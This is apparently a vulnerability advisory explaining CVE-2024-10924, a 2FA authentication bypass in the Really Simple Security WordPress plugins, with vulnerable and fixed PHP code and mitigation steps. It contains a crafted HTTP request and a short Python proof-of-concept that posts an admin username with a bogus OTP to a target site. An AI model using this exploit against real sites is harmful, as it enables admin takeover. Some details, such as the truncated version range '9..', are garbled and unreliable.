CVE-2024-10924 - Auth Bypass in Really Simple Security Plugins Lets Hackers Impersonate Any WordPress User
CVE-2024-10924 is a newly disclosed vulnerability in the popular Really Simple Security plugins (Free, Pro, and Pro Multisite) for WordPress. This serious flaw affects versions 9.. to 9.1.1.1 and could allow an attacker to break into your website and obtain admin access by taking advantage of a coding mistake in how the plugins handle user authentication, specifically Two-Factor Authentication (2FA).
If your site runs any affected plugin version, and you’ve enabled 2FA (it’s _off_ by default), read below for a clear, step-by-step breakdown of how the exploit works, how to identify if you are at risk, and what you should do about it.
What Is CVE-2024-10924?
CVE-2024-10924 is an authentication bypass vulnerability in the "Really Simple Security" WordPress plugins. If Two-Factor Authentication is turned on, an attacker can trick your site into letting them log in _as any user they choose_, including administrators.
The flaw comes from bad error handling in a REST API function called check_login_and_get_user. The function is supposed to make sure that the person trying to log in really is who they claim to be, but because of a logic error it can be fooled into granting access even when the check fails.
Versions: 9.. – 9.1.1.1
The bug affects all plugin flavors, but the risky 2FA feature is disabled by default. You're only vulnerable if someone has turned 2FA (_Two-Factor Authentication_) on.
How Does the Exploit Work? (Technical Details & Code Snippet)
Let’s break down the bug and show where the exploit lives.
The vulnerability appears in the plugin's REST API—the part that handles 2FA logins via AJAX or API requests.
Here's a simplified version of the flawed code (the real function is more complex):
```php
// BAD: Vulnerable snippet from 'check_login_and_get_user'
function check_login_and_get_user($request) {
    $username = $request['username'];
    $user = get_user_by('login', $username);
    if (!$user) {
        // Error handling is weak here!
        return new WP_Error('invalid_user', 'User not found');
    }
    // Vulnerable: Error from previous steps isn't properly checked
    $otp_valid = really_simple_security_verify_otp($user, $request['otp']);
    if (is_wp_error($otp_valid)) {
        // Proper check is missing!
        // Execution keeps going even with failed OTP
    }
    // OOPS: Returns user object even on failure!
    return $user;
}
```
Key points in this snippet:
- If really_simple_security_verify_otp() reports a failed second-factor check (wrong code), the function doesn’t _stop_. Instead, it returns the $user object anyway.
- That means an attacker who knows a username can _skip 2FA_ and get logged in just by calling this endpoint with bogus values.
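For comparison, here is the same simplified function with the missing check restored. This is an added example written for this page, not the plugin author's actual patch; really_simple_security_verify_otp() is the placeholder helper name used in the snippet above, and maybe_sign_in() is a hypothetical caller that shows how the return value must be treated.

```php
<?php
// Added example (not the plugin's real fix): every failure path returns a
// WP_Error, so a WP_User is only ever returned after the second factor verified.
function check_login_and_get_user_fixed( $request ) {
    $username = isset( $request['username'] ) ? sanitize_user( $request['username'] ) : '';
    $otp      = isset( $request['otp'] ) ? (string) $request['otp'] : '';

    if ( '' === $username || '' === $otp ) {
        return new WP_Error( 'missing_params', 'Username and OTP are required', array( 'status' => 400 ) );
    }

    $user = get_user_by( 'login', $username );
    if ( ! $user instanceof WP_User ) {
        // Same generic message as the OTP failure, so the endpoint does not
        // reveal which usernames exist.
        return new WP_Error( 'login_failed', 'Authentication failed', array( 'status' => 401 ) );
    }

    // Placeholder helper from the page's snippet: assumed to return true on
    // success and a WP_Error (or false) on failure.
    $otp_valid = really_simple_security_verify_otp( $user, $otp );

    // The fix: a WP_Error, or anything other than boolean true, stops execution here.
    if ( is_wp_error( $otp_valid ) || true !== $otp_valid ) {
        return new WP_Error( 'login_failed', 'Authentication failed', array( 'status' => 401 ) );
    }

    return $user;
}

// Hypothetical caller: never create a session unless a WP_User came back.
function maybe_sign_in( $request ) {
    $user = check_login_and_get_user_fixed( $request );
    if ( is_wp_error( $user ) ) {
        return $user; // the REST server turns this into a 4xx JSON error
    }
    wp_set_current_user( $user->ID );
    wp_set_auth_cookie( $user->ID, false, is_ssl() );
    return rest_ensure_response( array( 'logged_in' => true ) );
}
```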
An attacker could send a specially crafted API request:
```http
POST /wp-json/really-simple-security/v1/check_login_and_get_user
Content-Type: application/json

{
  "username": "admin",
  "otp": "123456"
}
```
Here `123456` is a completely made-up OTP code.
Due to the bug, the response comes back with the details for user “admin”, even though no valid OTP was provided. In a more complex attack, the attacker could use this to fully authenticate and get admin access.
Proof-of-concept Python code:
```python
import requests

url = 'https://target-site.com/wp-json/really-simple-security/v1/check_login_and_get_user'
data = {
    'username': 'admin',
    'otp': 'any-code-here'
}
r = requests.post(url, json=data)
print(r.text)
```
Replace target-site.com with your victim (or test instance). If you get back a valid user object, the plugin is vulnerable.
Check if 2FA is On:
Go to plugin settings and confirm if “Two-Factor Authentication” is enabled. If it’s _off_, you’re not exposed.
How Do I Fix or Mitigate The Problem?
- Update Immediately: Upgrade to the latest version of Really Simple Security—a patch is available ([link below](#references--more-reading)).
- Temporarily Disable 2FA: If you _cannot update now_, turn off the “Two-Factor Authentication” setting in the plugin.
- Check Users: Review your site's user accounts for suspicious logins or changes.
- Restrict REST API Access: For advanced users, firewall or disable plugin REST API endpoints until patched.
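One way to do the last step without touching the plugin is a must-use plugin that refuses requests to the affected route before it is dispatched. This is an added example, not code from the plugin or its author; it assumes the route path quoted on this page and should be removed once the update is applied.

```php
<?php
/**
 * Plugin Name: Block Really Simple Security 2FA login route (temporary mitigation)
 * Description: Added example for CVE-2024-10924. Place in wp-content/mu-plugins/
 *              until the plugin is updated, then delete it.
 */

// Route path as quoted on this page; verify it against your installed version.
const RSS_TEMP_BLOCKED_ROUTES = array(
    '/really-simple-security/v1/check_login_and_get_user',
);

// rest_pre_dispatch runs before any endpoint callback; returning a WP_Error
// short-circuits the request with a JSON error and the given HTTP status.
add_filter( 'rest_pre_dispatch', function ( $result, $server, $request ) {
    $route = $request->get_route();
    foreach ( RSS_TEMP_BLOCKED_ROUTES as $blocked ) {
        if ( 0 === strpos( $route, $blocked ) ) {
            // Leave a trace in the PHP error log so attempts can be reviewed later.
            error_log( sprintf(
                'CVE-2024-10924 mitigation: blocked %s %s from %s',
                $request->get_method(),
                $route,
                $_SERVER['REMOTE_ADDR'] ?? 'unknown'
            ) );
            return new WP_Error(
                'rest_route_disabled',
                'This endpoint is temporarily disabled.',
                array( 'status' => 403 )
            );
        }
    }
    return $result;
}, 10, 3 );
```

After installing it, confirm that a request to the route now returns HTTP 403 and that normal login and the rest of the REST API still work.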
References & More Reading
- WPScan: CVE-2024-10924 – Really Simple Security
- NVD Entry for CVE-2024-10924
- Plugin Author’s Changelog and Patch
- Original Plugin Page: Really Simple Security
- Wordfence Threat Intelligence
TL;DR
If you run Really Simple Security (any version 9.. – 9.1.1.1) and have 2FA turned on, attackers can log in as _any user they want_. Update now! If you can’t, turn off 2FA in the plugin and restrict access to the related REST API routes.
For more help, contact your plugin vendor or hosting provider.
Timeline
Published on: 11/15/2024 04:15:03 UTC
Last modified on: 11/19/2024 14:15:17 UTC